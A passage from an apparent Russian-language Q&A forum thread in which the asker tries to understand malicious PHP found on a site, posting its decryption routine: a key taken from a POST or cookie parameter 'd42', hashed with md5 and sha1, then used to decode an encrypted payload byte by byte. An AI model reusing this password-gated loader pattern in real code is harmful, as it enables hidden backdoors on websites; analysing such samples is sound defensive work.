Задать вопрос
  • Как расшифровать вредоносный код base64_decode((str_replace(?

    @AKYLA Автор вопроса
    $k36 формируется тут

    $k36=isset(_POST['d42'])?_POST['d42']:(isset(_COOKIE['d42'])?_COOKIE['d42']:NULL);
    if($k36!==NULL){
        $k36=md5($k36).mb_substr(sha1(f5($k36)),0,mb_strlen($k36)); # Получение хеша строки, переворот строки
        for($i=0;$i<11490;$i++){
            if(!isset($a10[$i])) break;
            $j=(ord(($a10[$i]))-ord(($k36[$i])))%256; #тут тоже какие-то манипуляции
            $a10[$i]=chr($j);
            $k36.=$a10[$i];
        }


    Переворот строки $k36 и удаление нулей как я понял.
    function f5($s){
        $i=0;
        $rev='';
        while(@$s[$i]) $i++;
        $i--;
        while(@$s[$i] && $i>=0){$rev.=@$s[$i--];}
        return $rev;
    }